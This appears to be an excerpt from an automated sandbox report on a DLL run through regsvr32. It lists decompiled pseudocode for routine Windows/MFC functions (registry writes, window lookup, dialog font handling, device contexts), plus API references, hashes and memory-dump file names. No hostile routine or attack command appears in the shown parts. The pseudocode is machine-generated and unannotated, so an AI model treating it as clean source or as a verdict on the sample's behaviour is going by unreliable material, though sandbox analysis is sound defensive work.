0x10027503
0x100274b4
0x100274bc
0x00000000

APIs

lstrlenA.KERNEL32(?), ref: 100274A0
RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 100274B4
RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 100274CE
lstrlenA.KERNEL32(?), ref: 100274DB
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 100274F0
RegCloseKey.ADVAPI32(?), ref: 100274FB

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Valuelstrlen$CloseCreate
String ID:
API String ID: 306239685-0
Opcode ID: b98d6f689e483a70c17520ea159640c3281620c63b2fce4f4f9897c40c2de14e
Instruction ID: 1a083539fbb7e3cf4d2df25f18eb296ca7e546c33c8e0ee3a617baa585e2e8d4
Opcode Fuzzy Hash: b98d6f689e483a70c17520ea159640c3281620c63b2fce4f4f9897c40c2de14e
Instruction Fuzzy Hash: 03012832100129BFEF029FA0EC48FDA3B69FB09391F118050FE1AD9060D7B18AA0DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10021C73 Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E10021C73(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

0x10021c82
0x10021c8e
0x10021c90
0x10021cd3
0x10021cd3
0x10021cd5
0x10021cd9
0x00000000
0x00000000
0x10021c9f
0x10021cb6
0x10021cbc
0x10021cce
0x00000000
0x10021ce1
0x10021cce
0x10021cd0
0x10021cd2
0x10021cd2
0x10021cde

APIs

ClientToScreen.USER32(?,?), ref: 10021C82
GetDlgCtrlID.USER32 ref: 10021C96
GetWindowLongA.USER32(00000000,000000F0), ref: 10021CA4
GetWindowRect.USER32 ref: 10021CB6
PtInRect.USER32(?,?,?), ref: 10021CC6
GetWindow.USER32(?,00000005), ref: 10021CD3

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 1d9de721b9a26bd69ca62d5b2478726604d9982e888f588691e81107ad8f01a7
Instruction ID: 056b4d92a6fa20764070ee86cb15b7d4404cee6e30cb9152d70db7d47511102d
Opcode Fuzzy Hash: 1d9de721b9a26bd69ca62d5b2478726604d9982e888f588691e81107ad8f01a7
Instruction Fuzzy Hash: 6301A23D140525EBEB119F55AD48FEE377CEF86390F540010F902D5150D730D9129B94

Uniqueness

Uniqueness Score: -1.00%

Function 1002A471 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1002A471(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E1002A0B5(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E1002A121(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100483AC(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E100224F1(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E100224F1(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E1004763E(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

0x1002a471
0x1002a471
0x1002a471
0x1002a477
0x1002a47e
0x1002a485
0x1002a48b
0x1002a48e
0x1002a497
0x1002a498
0x1002a4a1
0x1002a4af
0x1002a4b2
0x1002a4ba
0x1002a4d0
0x1002a4d2
0x1002a4d5
0x1002a4dd
0x1002a4d7
0x1002a4d7
0x1002a4d7
0x1002a4ec
0x1002a56a
0x1002a56a
0x1002a4ee
0x1002a503
0x1002a508
0x1002a50b
0x00000000
0x1002a50d
0x1002a50e
0x1002a514
0x1002a519
0x1002a51b
0x1002a521
0x1002a526
0x1002a52a
0x1002a52a
0x1002a52e
0x1002a532
0x1002a535
0x1002a539
0x1002a53c
0x1002a543
0x1002a546
0x1002a54e
0x1002a548
0x1002a548
0x1002a548
0x1002a555
0x1002a57a
0x1002a581
0x1002a58a
0x1002a592
0x1002a59f
0x1002a5a2
0x1002a5a8
0x1002a5ae
0x1002a55c
0x1002a55c
0x1002a563
0x1002a568
0x1002a572
0x1002a577
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a568
0x1002a555
0x1002a50b
0x1002a5af
0x1002a5b0
0x1002a490
0x1002a490
0x1002a490
0x1002a5bd

APIs

GlobalLock.KERNEL32 ref: 1002A49B
lstrlenA.KERNEL32(?), ref: 1002A4E3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002A4FD

Strings

System, xrefs: 1002A497

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: add4daa675d314f432678064272db609e7b0bf7928c7362a76e1f5644706ad66
Instruction ID: a362d802a26bc59b02e68d4c8ec6b0a0d691d4ff30d83771d59177cbbb1e45ed
Opcode Fuzzy Hash: add4daa675d314f432678064272db609e7b0bf7928c7362a76e1f5644706ad66
Instruction Fuzzy Hash: 1341F471D00225DFDB04DFA4CC85A9EBBB5FF05310F648129E802EB285EB74A985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1002B4A4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E1002B4A4(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t46;
				intOrPtr _t53;
				intOrPtr _t58;
				void* _t74;
				void* _t77;

				_t76 = __esi;
				_t75 = __edi;
				_t74 = __edx;
				_push(0x20);
				E100476B6(0x100900e4, __ebx, __edi, __esi);
				_t58 = __ecx;
				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1009ddfc;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t77 - 4) = 2;
				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t58 + 0x4c)) == 0) {
						L12:
						E100213E6(_t58, _t58 + 0x24, _t75);
						L10020F7B(_t58 + 0x64);
						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
						_push(_t77 - 0x20);
						if(E10021182(_t58, 0x100a594c) >= 0) {
							_t76 = "mfcm80.dll";
							_t75 = _t77 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t77 - 0x1c);
							if(_t44 != 0) {
								_t46 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t46 != 0) {
									 *_t46( *(_t77 - 0x20));
								}
							}
							_t45 =  *(_t77 - 0x20);
							_t38 =  *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t77 - 4) = 1;
						E100222E4(_t38, _t58, _t58 + 0x40, _t74);
						 *(_t77 - 4) = 0;
						E100215BB(_t58, _t58 + 0x24, _t74, _t75);
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						L10010C62(_t58);
						return E10047739(_t58, _t75, _t76);
					}
					_t75 = _t58 + 0x40;
					do {
						_t76 = E100221E9(_t58, _t75, _t75, _t76);
						_t85 = _t76;
						if(_t76 != 0) {
							L1002AB59(_t76);
							_push(_t76);
							E10009F3F(_t58, _t75, _t76, _t85);
						}
					} while ( *((intOrPtr*)(_t58 + 0x4c)) != 0);
					goto L12;
				} else {
					_t75 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
						_t76 =  *((intOrPtr*)(E10012115(_t77 - 0x24)));
						if(_t76 != 0) {
							_t53 =  *((intOrPtr*)(_t76 + 4));
							if(_t53 != 0) {
								_t82 =  *((intOrPtr*)(_t53 + 0x90));
								if( *((intOrPtr*)(_t53 + 0x90)) == 0) {
									E1002223E(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
									L1002AB59(_t76);
									_push(_t76);
									E10009F3F(_t58, _t75, _t76, _t82);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t77 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}

0x1002b4a4
0x1002b4a4
0x1002b4a4
0x1002b4a4
0x1002b4ab
0x1002b4b0
0x1002b4b2
0x1002b4b5
0x1002b4bb
0x1002b4c0
0x1002b4c7
0x1002b4ca
0x1002b512
0x1002b516
0x1002b53c
0x1002b53f
0x1002b548
0x1002b54d
0x1002b554
0x1002b563
0x1002b565
0x1002b56a
0x1002b56d
0x1002b56e
0x1002b56f
0x1002b575
0x1002b576
0x1002b57e
0x1002b586
0x1002b58e
0x1002b593
0x1002b595
0x1002b58e
0x1002b596
0x1002b59c
0x1002b59c
0x1002b5a2
0x1002b5a6
0x1002b5ae
0x1002b5b2
0x1002b5b7
0x1002b5bd
0x1002b5c7
0x1002b5c7
0x1002b518
0x1002b51b
0x1002b522
0x1002b524
0x1002b526
0x1002b52a
0x1002b52f
0x1002b530
0x1002b535
0x1002b536
0x00000000
0x1002b4cc
0x1002b4cc
0x1002b4cf
0x1002b4cf
0x1002b4dd
0x1002b4e1
0x1002b4e3
0x1002b4e8
0x1002b4ea
0x1002b4f1
0x1002b4f8
0x1002b4ff
0x1002b504
0x1002b505
0x1002b50a
0x1002b4f1
0x1002b4e8
0x1002b50b
0x1002b50e
0x00000000
0x1002b4cf

APIs

__EH_prolog3_GS.LIBCMT ref: 1002B4AB
GetModuleHandleA.KERNEL32(?,100A594C,00000000,?), ref: 1002B576
GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 1002B586

Strings

mfcm80.dll, xrefs: 1002B565
MFCM80ReleaseManagedReferences, xrefs: 1002B580

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressH_prolog3_HandleModuleProc
String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
API String ID: 2418878492-2500072749
Opcode ID: 80343a24d9ad312cc0189bf1200974e93c016c673bca73313ab3d4f112bb6e1d
Instruction ID: 5b1ac1d8a87dcaac49d10090e8121a3023399b1f3b7fcdc41daf1712c1936ba1
Opcode Fuzzy Hash: 80343a24d9ad312cc0189bf1200974e93c016c673bca73313ab3d4f112bb6e1d
Instruction Fuzzy Hash: A6319E34A00A15DBDB15DFA4E881BED77F5EF08340F8100A8E905AF282DB79EE04CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000B32A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000B32A(void* __ebx, CHAR* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				void* _t32;
				void* _t35;
				DEVMODEA* _t36;
				CHAR** _t39;
				signed short _t48;
				signed short _t54;
				intOrPtr _t56;
				void* _t71;
				CHAR** _t72;
				signed short _t75;
				CHAR** _t76;
				struct HDC__* _t78;
				void* _t79;
				void* _t80;

				_t69 = __edi;
				_t52 = __ebx;
				E100476B6(0x1008ddcd, __ebx, __edi, __esi);
				 *0x100bb480(0x1c);
				 *((intOrPtr*)(_t79 - 0x14)) = 0;
				_t30 =  *((intOrPtr*)(_t79 + 8));
				 *((intOrPtr*)(_t79 - 4)) = 0;
				if(_t30 != 0) {
					_t54 =  *(_t30 + 0xa) & 0x0000ffff;
					__eflags = _t54;
					if(_t54 != 0) {
						_t75 = (_t54 & 0x0000ffff) + _t30;
						__eflags = _t75;
					} else {
						_t75 = 0;
					}
					_t56 = ( *(_t30 + 8) & 0x0000ffff) + _t30;
					_t52 = ( *(_t30 + 4) & 0x0000ffff) + _t30;
					_t71 = ( *(_t30 + 6) & 0x0000ffff) + _t30;
					__eflags = _t75;
					 *((intOrPtr*)(_t79 - 0x1c)) = _t56;
					if(__eflags != 0) {
						_t32 = ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c;
						__eflags = _t32 - 0x400;
						if(__eflags > 0) {
							L11:
							_t34 = ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c;
							__eflags = ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c;
							_t57 = _t79 - 0x14;
							_t35 = L100012BC(_t52, _t79 - 0x14, 0, _t71, ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c, _t34);
							L12:
							_t36 = L1000AC5A(_t57, _t35, _t75);
							_t56 =  *((intOrPtr*)(_t79 - 0x1c));
							 *(_t79 - 0x18) = _t36;
							L13:
							_push(_t56);
							_t76 = E1000B053(_t52, _t79 - 0x28, _t71, _t75, __eflags);
							_push(_t71);
							 *((char*)(_t79 - 4)) = 1;
							_t72 = E1000B053(_t52, _t79 - 0x20, _t71, _t76, __eflags);
							_push(_t52);
							 *((char*)(_t79 - 4)) = 2;
							_t39 = E1000B053(_t52, _t79 - 0x24, _t72, _t76, __eflags);
							_t69 =  *_t72;
							_t78 = CreateDCA( *_t39,  *_t72,  *_t76,  *(_t79 - 0x18));
							L100013E3( *((intOrPtr*)(_t79 - 0x24)) + 0xfffffff0, 0);
							L100013E3( *((intOrPtr*)(_t79 - 0x20)) + 0xfffffff0, 0);
							_t44 = L100013E3( *((intOrPtr*)(_t79 - 0x28)) + 0xfffffff0, 0);
							L2:
							L10001389(_t44, _t79 - 0x14);
							return E10047739(_t52, _t69, _t78);
						}
						_t48 = L10001492(_t52, 0, _t71, _t75, __eflags);
						__eflags = _t48;
						_t57 = _t32;
						if(_t48 == 0) {
							goto L11;
						}
						E10048380(( *(_t75 + 0x46) & 0x0000ffff) + 0x9c);
						_t35 = _t80;
						goto L12;
					}
					 *(_t79 - 0x18) = 0;
					goto L13;
				}
				_t78 = CreateDCA("DISPLAY", 0, 0, 0);
				goto L2;
			}

0x1000b32a
0x1000b32a
0x1000b331
0x1000b336
0x1000b33e
0x1000b341
0x1000b346
0x1000b349
0x1000b370
0x1000b374
0x1000b377
0x1000b380
0x1000b380
0x1000b379
0x1000b379
0x1000b379
0x1000b38e
0x1000b390
0x1000b392
0x1000b394
0x1000b396
0x1000b399
0x1000b3a4
0x1000b3a9
0x1000b3ae
0x1000b3cd
0x1000b3d1
0x1000b3d1
0x1000b3d7
0x1000b3da
0x1000b3df
0x1000b3e1
0x1000b3e6
0x1000b3e9
0x1000b3ec
0x1000b3ec
0x1000b3f5
0x1000b3f7
0x1000b3fb
0x1000b404
0x1000b406
0x1000b40a
0x1000b40e
0x1000b418
0x1000b42b
0x1000b42d
0x1000b438
0x1000b443
0x1000b35b
0x1000b35e
0x1000b36d
0x1000b36d
0x1000b3b1
0x1000b3b6
0x1000b3b8
0x1000b3b9
0x00000000
0x00000000
0x1000b3c4
0x1000b3c9
0x00000000
0x1000b3c9
0x1000b39b
0x00000000
0x1000b39b
0x1000b359
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 1000B331
CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 1000B353
__alloca_probe_16.LIBCMT ref: 1000B3C4
CreateDCA.GDI32(?,?,?,?), ref: 1000B41F

Strings

DISPLAY, xrefs: 1000B34E

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Create$H_prolog3___alloca_probe_16
String ID: DISPLAY
API String ID: 1675797461-865373369
Opcode ID: 9827bb6cd6178643bf86aa37fe2b8c033721bd6de136d3be4650f1a94324d876
Instruction ID: c7dea487c0f5ddc0058b127140378c40b3c3e8784b0faee1b94e8b47be7bb17c
Opcode Fuzzy Hash: 9827bb6cd6178643bf86aa37fe2b8c033721bd6de136d3be4650f1a94324d876
Instruction Fuzzy Hash: 8631C175C00524CBEB24DFA4C895AFEB7F0EF84394F254129F856A7296EA346E40C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 1002BD4A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
comCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E1002BD4A(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E100476B6(0x10090176, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x1009d434;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					if(E10001230(_t91 - 0x54, 0x11) != 0 || E10001230(_t91 - 0x54, 0xd) != 0) {
						_t49 = _t91 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t90 + 0x64)) = 0;
					}
				} else {
					L6:
					_t11 = _t49 + 4; // 0x1001e491
					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E1000B9D2(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
					L1000CDFE(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					L10020F7B(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x100a5fec, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					L1000CE52(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					L100013E3( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10098308;
				L1000CFF6(_t91 - 0x54);
				return E10047739(_t74, 0, _t90);
			}

0x1002bd4a
0x1002bd4a
0x1002bd54
0x1002bd59
0x1002bd5e
0x1002bd60
0x1002bd63
0x1002bd6c
0x1002bd6f
0x1002bd82
0x1002bd9a
0x00000000
0x1002bd92
0x1002bd92
0x1002bd92
0x1002bd9d
0x1002bd9d
0x1002bda3
0x1002bda6
0x1002bdaf
0x1002bdb3
0x1002bdba
0x1002bdc2
0x1002bdc9
0x1002bdd2
0x1002bdda
0x1002bde1
0x1002bde8
0x1002bdeb
0x1002bdee
0x1002bdf0
0x1002bdf4
0x1002bdf6
0x1002bdfa
0x1002bdfa
0x1002be05
0x1002be12
0x1002be1c
0x1002be20
0x1002be26
0x1002be27
0x1002be29
0x1002be2d
0x1002be30
0x1002be33
0x1002be3e
0x1002be42
0x1002be48
0x1002be4a
0x1002be4c
0x1002be4c
0x1002be54
0x1002be58
0x1002be60
0x1002be63
0x1002be63
0x1002be68
0x1002be6f
0x1002be76
0x1002be80

APIs

__EH_prolog3_GS.LIBCMT ref: 1002BD54
GetObjectA.GDI32(1001E491,0000003C,?), ref: 1002BDA6
GetDeviceCaps.GDI32(?,0000005A), ref: 1002BE16
OleCreateFontIndirect.OLEAUT32(00000020,100A5FEC), ref: 1002BE42

Strings

, xrefs: 1002BDB3

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
